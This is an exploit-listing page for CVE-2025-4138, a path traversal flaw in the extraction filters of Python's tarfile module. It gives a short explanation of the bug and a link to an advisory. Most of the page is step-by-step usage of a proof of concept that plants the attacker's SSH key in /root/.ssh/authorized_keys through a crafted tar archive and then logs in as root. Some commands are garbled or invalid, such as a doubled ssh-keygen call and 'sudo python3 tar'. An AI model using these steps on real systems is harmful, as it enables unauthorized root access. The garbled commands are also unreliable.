Share
## https://sploitus.com/exploit?id=68A89ED4-479F-5405-A2BD-7B495BAE4D0B
# CVE-2025-4138 (Python Tarfile module Directory Traversal Vulnerability  With overflow crossed Directory )
Impact : Privilege escalation 


----
Working :

Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementations **tar_filter ("tar")** and **data_filter** ("data"), each with differing checks to improve the safety of tarfile extraction.

A bug exists when processing a path with symlinks is shorter than **PATH_MAX**, but longer than **PATH_MAX** when the symlinks are substituted by os.path.realpath(). Any symlinks that are beyond PATH_MAX are not expanded.

os.path.realpath() is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later during extractall() or extract() the paths are used without passing them through os.path.realpath().

Reference : https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f

-----
How To USed PoC :

1. We are Going to Paste our ssh public key over **/root/.ssh/authorized_keys** for privilege escalation .
2. Follow Below Commands for abuse


```
ssh-keygen -t ed25519 -f ssh-keygen -t ed25519 -f any
mkdir test

mv any.pub authorized_keys
cp authorized_keys /test
cd test

#Put your public key file name (authorized_keys)
python3 exploit.py
(file.tar) ~ generated

# Now using Python3
sudo python3 tar -xvf file.tar

#login
chmod 600 any
ssh -i any user@ip

```